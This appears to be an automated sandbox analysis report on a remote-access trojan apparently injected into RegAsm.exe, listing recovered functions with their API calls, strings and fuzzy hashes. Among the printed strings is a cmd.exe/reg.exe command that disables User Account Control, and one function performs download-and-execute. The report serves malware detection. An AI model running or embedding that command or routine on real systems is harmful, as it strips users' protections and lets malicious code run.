Opcode Fuzzy Hash: b8efc3080a58efbd5eeef1a2aefda9b54f9d6a5126152bd72706fcf9128d32df
Instruction Fuzzy Hash: 62F02231501228ABD2106F249C49EFF3B6CDF40B62F00002AFF0992182DB38DD0596A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB5F Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB6E
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB82
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB8F
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A471,00000000), ref: 0041AB9E
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A471,00000000), ref: 0041ABB0
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A471,00000000), ref: 0041ABB3

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 6b308d3d3828d04a5c81abbbdd3fc3d303577ed345ddfa8b1085d6bdbe930796
Instruction ID: b039222477f72e669e19058168d6a4c5c9cd5d8c05413f4857ae13130e95784f
Opcode Fuzzy Hash: 6b308d3d3828d04a5c81abbbdd3fc3d303577ed345ddfa8b1085d6bdbe930796
Instruction Fuzzy Hash: D5F02231501218ABD211AB24AC49EFF3B6CDB40B62F00006AFF0992182DB38CE4595A9

Uniqueness

Uniqueness Score: -1.00%

Function 00443992 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

X8_, xrefs: 00443995

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: X8_
API String ID: 0-1906660996
Opcode ID: 639b9409e2fb930854833158115cd827a0c242071936a85f60160cf34ce6723c
Instruction ID: 54c03e9ce3202a4369395dee973575ff668b27e25674208517661f9046cc78fb
Opcode Fuzzy Hash: 639b9409e2fb930854833158115cd827a0c242071936a85f60160cf34ce6723c
Instruction Fuzzy Hash: C901F2B22093067EFA202E792CC5F67271CCF41BBAB31032BF421612C1EAA8CD00416D

Uniqueness

Uniqueness Score: -1.00%

Function 0041D45D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32 ref: 0041D4A9
CreateWindowExA.USER32 ref: 0041D4C4
GetLastError.KERNEL32 ref: 0041D4CE

Strings

MsgWindowClass, xrefs: 0041D474
0, xrefs: 0041D479

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: 74b65070635049ec2d26739a327afccf73436923b15f71c562a2fffb27c52056
Instruction ID: a4d69617be618aa425c15b7907214d431a9aa1418f7ef19932ca55fe49f400dc
Opcode Fuzzy Hash: 74b65070635049ec2d26739a327afccf73436923b15f71c562a2fffb27c52056
Instruction Fuzzy Hash: 1701E5B1D0021DBBDB00DFA5ECC49EFBBBCFA05355F40452AF915A6240E77999058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
CloseHandle.KERNEL32(?), ref: 004077AA
CloseHandle.KERNEL32(?), ref: 004077AF

Strings

C:\Windows\System32\cmd.exe, xrefs: 00407796
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction ID: 6d22cccb136f8c7c36af3d9037574c26d6fdc27d3282f638de1bcab3d2eebeae
Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction Fuzzy Hash: 91F03676D402AD76CB20ABD69C0DEDF7F7CEBC5B11F00056AF904A6141D6745404C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
SG, xrefs: 004076DA

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
API String ID: 0-97610266
Opcode ID: 609596a1dfd73e3e14ef38a12528c0b0aa9ed42c21a05a81d57c6312ddfedd5a
Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
Opcode Fuzzy Hash: 609596a1dfd73e3e14ef38a12528c0b0aa9ed42c21a05a81d57c6312ddfedd5a
Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E

Uniqueness

Uniqueness Score: -1.00%

Function 00443299 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044324A,?,?,004431EA,?), ref: 004432B9
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044324A,?,?,004431EA,?), ref: 004432CC
FreeLibrary.KERNEL32(00000000,?,?,?,0044324A,?,?,004431EA,?), ref: 004432EF

Strings

CorExitProcess, xrefs: 004432C4
mscoree.dll, xrefs: 004432B2

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f5213dab678aaad7ce64006389dcdf2bf679603fda04a95a9a10c3b8942720a1
Instruction ID: d6523aa37e87c1c2bcc0dcc45afbce366257b9007ee31406ae6b5b7091a20f6c
Opcode Fuzzy Hash: f5213dab678aaad7ce64006389dcdf2bf679603fda04a95a9a10c3b8942720a1
Instruction Fuzzy Hash: FEF06830A10209FBDF119F55DC4ABAEBFB4EF04717F1040A9FC05A2261DB759E44CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
CloseHandle.KERNEL32(?), ref: 00405140

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

Strings

KeepAlive | Disabled, xrefs: 004050F9

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: c89493562ef56592cd274de949ad9ad6ba40f59555c5c3e9409e64ec138271b3
Instruction ID: be8b30cc66014f6f38b18e309eaaceb63009414c245f721ed48000bbed9aec6c
Opcode Fuzzy Hash: c89493562ef56592cd274de949ad9ad6ba40f59555c5c3e9409e64ec138271b3
Instruction Fuzzy Hash: 35F06D71904711BBDB103B758D0AA6B7A98AB02311F0009BEF982916E2D6798840CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD0E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AD40
PlaySoundW.WINMM(00000000,00000000), ref: 0041AD4E
Sleep.KERNEL32(00002710), ref: 0041AD55
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AD5E

Strings

Alarm triggered, xrefs: 0041AD17

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: 4dafe254b891ac29e7b72a4f72621bc5709ac5193998fbb15c850d7c7e1b3c37
Instruction ID: 4347c1bab0e95251c889606097f69e32bbbd9763772de416a0f4cb90da384652
Opcode Fuzzy Hash: 4dafe254b891ac29e7b72a4f72621bc5709ac5193998fbb15c850d7c7e1b3c37
Instruction Fuzzy Hash: 13E01226A44260779610337B6D4FD6F3D28DAC2B5174500BEFA0666192D9580C458AFB

Uniqueness

Uniqueness Score: -1.00%

Function 0041CCA6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CD3B), ref: 0041CCB0
GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CCBD
SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CCCA
SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CCDD

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CCD0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: 8ff930b8604bb53ffe35bf108dd56401a2603a1966e7a2aa141ca9340b3fe5c1
Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
Opcode Fuzzy Hash: 8ff930b8604bb53ffe35bf108dd56401a2603a1966e7a2aa141ca9340b3fe5c1
Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 004412DA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142ba21da1110888b7575ac3c17cce9c5c3346c5f5de57ddb1c4218e965c1a6b
Instruction ID: 6773e46793da779a19708a3feb32e25a3a8b71c5f8d5da9fc9af74bf1ccc1eec
Opcode Fuzzy Hash: 142ba21da1110888b7575ac3c17cce9c5c3346c5f5de57ddb1c4218e965c1a6b
Instruction Fuzzy Hash: 0271D431900216EBEB20CF55C844AFFBB74EF85361F54422BE816972A1D7788CC1CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00449225 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 0044928F
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449307
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449334
_free.LIBCMT ref: 0044927D

Part of subcall function 00446642: HeapFree.KERNEL32(00000000,00000000), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00449449

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: e861f10619cee8555c14399ef2ad6aeaf2311a34d1c0502880df977b07f1d2e5
Instruction ID: 735babbbd0be657ab0757445e5474bf64f8f3a8b7ca3a8d9b3b34063795322e9
Opcode Fuzzy Hash: e861f10619cee8555c14399ef2ad6aeaf2311a34d1c0502880df977b07f1d2e5
Instruction Fuzzy Hash: 86511D71800205EBEB14EFA5DD819AFB7B8EF45314F1442AFE81493291E7788D41DB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F84B Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BF05: GetCurrentProcess.KERNEL32(?,?,?,0040D9F8,WinDir,00000000,00000000), ref: 0041BF16

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F869
Process32FirstW.KERNEL32(00000000,?), ref: 0040F88D
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F89C
CloseHandle.KERNEL32(00000000), ref: 0040FA53

Part of subcall function 0041BF33: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F547,00000000,?,?,00475338), ref: 0041BF48

Part of subcall function 0041C12B: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C143
Part of subcall function 0041C12B: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C156

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FA44

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 4269425633-0
Opcode ID: 7ce0eaa0b2930da6a74499d106fb459c324b9ed2a72e41934db5320175e10e7c
Instruction ID: a0c68ada47c0804736a7b2772d1db97e9bc00546201e077e59639075b0857204
Opcode Fuzzy Hash: 7ce0eaa0b2930da6a74499d106fb459c324b9ed2a72e41934db5320175e10e7c
Instruction Fuzzy Hash: 574134311083419BC325F722DC55AEFB3A5AF94344F50493EF58A921E2EF385A4AC69A

Uniqueness

Uniqueness Score: -1.00%

Function 00443D58 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443DCA
_free.LIBCMT ref: 00443DEA

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 8692cb65d4d6bb9cba31bc66b02b2d447c0bbfc8e4e9d82d370da2cfb380f7a9
Instruction ID: 180f8567f3436ff6df5672f1cc1a10b237692132214a9588386a8a5d626758db
Opcode Fuzzy Hash: 8692cb65d4d6bb9cba31bc66b02b2d447c0bbfc8e4e9d82d370da2cfb380f7a9
Instruction Fuzzy Hash: 1841E436A002009FDB20DF79C881A5AB7B5EF88B14F2545AEE515EB351D735AE01CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0045106D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DC4F,?,?,?,00000001,00000000,?,00000001,0042DC4F,0042DC4F), ref: 004510BA
__alloca_probe_16.LIBCMT ref: 004510F2
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DC4F,?,?,?,00000001,00000000,?,00000001,0042DC4F,0042DC4F,?), ref: 00451143
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DC4F,0042DC4F,?,00000002,00000000), ref: 00451155
__freea.LIBCMT ref: 0045115E

Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 35e11d48413dc489e856582e25e527118db88685274ad62c195dd2d50e657527
Instruction ID: e5d6c08e9d18d7846db305dd98d41714dd399240760fd92c9c86a3e4aaa02a35
Opcode Fuzzy Hash: 35e11d48413dc489e856582e25e527118db88685274ad62c195dd2d50e657527
Instruction Fuzzy Hash: 0F312132A0020AABDF248F65CC41EAF7BA5EF08341F05416AFD14D72A2E739CC54CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0044F29B Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F2A4
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F2C7

Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F2ED
_free.LIBCMT ref: 0044F300
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F30F

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 26a64bb5e553b5cb0209a030f740bd6b5f4a85ef111b74e0953c4f09e5a519ea
Instruction ID: 6f93c96cac939cab9531f5e5a2489491171a956b12200d0629ea11f0b50ef7ae
Opcode Fuzzy Hash: 26a64bb5e553b5cb0209a030f740bd6b5f4a85ef111b74e0953c4f09e5a519ea
Instruction Fuzzy Hash: 6001D472601711BF77211ABA5C8CC7F6A6CEAC6FA6325013BFC04C2205DA698C0591B9

Uniqueness

Uniqueness Score: -1.00%

Function 004110B1 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004110BE
int.LIBCPMT ref: 004110D1

Part of subcall function 0040E00F: std::_Lockit::_Lockit.LIBCPMT ref: 0040E020
Part of subcall function 0040E00F: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E03A

std::_Facet_Register.LIBCPMT ref: 00411111
std::_Lockit::~_Lockit.LIBCPMT ref: 0041111A
__CxxThrowException@8.LIBVCRUNTIME ref: 00411138

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
String ID:
API String ID: 2536120697-0
Opcode ID: 9106e99cca7860a2776a2a07fde2c54a9f73ca72b70fd8621fe786bfdd0ca6ee
Instruction ID: a4b3b54c979a96992e2bd1820719d1d15e96ebfc38258379f77cf37beeb677ff
Opcode Fuzzy Hash: 9106e99cca7860a2776a2a07fde2c54a9f73ca72b70fd8621fe786bfdd0ca6ee
Instruction Fuzzy Hash: 94113A32900514A7CB14EBA5D8058DEBBB89F48324F21006FFA04A73A1DB789E81C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00448159 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,0043BBC7,00000000,00000000,?,0043BC4B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044815E
_free.LIBCMT ref: 00448193
_free.LIBCMT ref: 004481BA
SetLastError.KERNEL32(00000000,?,00405103), ref: 004481C7
SetLastError.KERNEL32(00000000,?,00405103), ref: 004481D0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 73148e45db194749aa813c8d1e9651f1292055391ac483a56b3624eb5748bc14
Instruction ID: 0b380766fe1817187751ec2fb0ad1f4860a95c254106f4947c3de2dc19a13ac7
Opcode Fuzzy Hash: 73148e45db194749aa813c8d1e9651f1292055391ac483a56b3624eb5748bc14
Instruction Fuzzy Hash: F301D1361447006BB612272A6C86A6F316D9BD2775B32052FF909A22A2EE6CCC03816D

Uniqueness

Uniqueness Score: -1.00%

Function 004508FD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00450915

Part of subcall function 00446642: HeapFree.KERNEL32(00000000,00000000), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00450927
_free.LIBCMT ref: 00450939
_free.LIBCMT ref: 0045094B
_free.LIBCMT ref: 0045095D

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e5d56ee398bdfbfcfbbb3f4ba07dab2c02d7dab1510b0bbff9ebc0497d520251
Instruction ID: 29a0dbab307c4b395b57238b336e7f1280b31558f0d7efaeec20342ac47a58e2
Opcode Fuzzy Hash: e5d56ee398bdfbfcfbbb3f4ba07dab2c02d7dab1510b0bbff9ebc0497d520251
Instruction Fuzzy Hash: B9F0127650820067A620DB5DE8D3C1B73DDEA057117A6881BF948DB62BC738FCC0CA5C

Uniqueness

Uniqueness Score: -1.00%

Function 00443FA7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00443FC5

Part of subcall function 00446642: HeapFree.KERNEL32(00000000,00000000), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00443FD7
_free.LIBCMT ref: 00443FEA
_free.LIBCMT ref: 00443FFB
_free.LIBCMT ref: 0044400C

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 24d92841da83fb7def2b37d9385adf34fcb32afdec168f981d9737e382994ccf
Instruction ID: 24c1456feddea9d43312e9cc52bb540d1f60c9f15742623fd6849a2c11194e6b
Opcode Fuzzy Hash: 24d92841da83fb7def2b37d9385adf34fcb32afdec168f981d9737e382994ccf
Instruction Fuzzy Hash: DBF03AB18045208FA671AF2DBD524053B75A705760356412BF81C62A74C77949C2CFCF

Uniqueness

Uniqueness Score: -1.00%

Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0

Strings

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 00407007, 0040712F
open, xrefs: 00406FB6

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$open
API String ID: 2825088817-1632494013
Opcode ID: 59bc0fcb7643be1e8f8fe5933f2faa74453f59adb2d8415bab993e0a8c59123a
Instruction ID: e8f5d5918c01e45b9f58dfb5f701da15e03eec86fcc3d5a852d78a22cf403570
Opcode Fuzzy Hash: 59bc0fcb7643be1e8f8fe5933f2faa74453f59adb2d8415bab993e0a8c59123a
Instruction Fuzzy Hash: A761A071B0820156CA24FB76C8669BE77A99F81748F40093FF942772D2EE3C9905869F

Uniqueness

Uniqueness Score: -1.00%

Function 0044E5A9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044E5F8
_free.LIBCMT ref: 0044E715

Part of subcall function 0043BC59: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BC5B
Part of subcall function 0043BC59: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BC7D
Part of subcall function 0043BC59: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BC84

Strings

*?, xrefs: 0044E5EC
., xrefs: 0044E8CC

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 953ade1eaee2fe91f1041e702ec1c097f3b8de92aef54e7f0a6f9603ef5a3565
Instruction ID: 5c43e14eb4c3d169d765f7cc1b0ac18bd00b2d083d68f891a18fbf6c96fdc733
Opcode Fuzzy Hash: 953ade1eaee2fe91f1041e702ec1c097f3b8de92aef54e7f0a6f9603ef5a3565
Instruction Fuzzy Hash: 1E51C171E00209AFEF14CFAAC841AAEFBB5FF58314F25416EE454E7301E6399A018B54

Uniqueness

Uniqueness Score: -1.00%

Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3

